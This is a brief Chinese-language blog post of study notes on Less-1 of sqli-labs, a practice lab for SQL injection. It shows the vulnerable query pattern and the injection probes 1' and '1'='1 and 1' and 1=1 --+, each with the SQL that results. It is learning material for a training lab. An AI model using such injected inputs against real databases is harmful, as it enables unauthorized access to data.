时间:2021-07-01 10:21:17 帮助过:30人阅读
所以正确sql语句 为:
select username,password from table where id=‘input‘
所以:
id = 1‘ and ‘1‘=‘1
结果正确
即:
select username,password from table where id=‘1‘ and ‘1‘=‘1‘
或者:
id = 1‘ and 1=1 --+
结果正确
即:
select username,password from table where id=‘1‘ and 1=1 --+‘
sqli-labs less1 学习心得
标签:medium srm dss sql语句 bsp ebe doc png har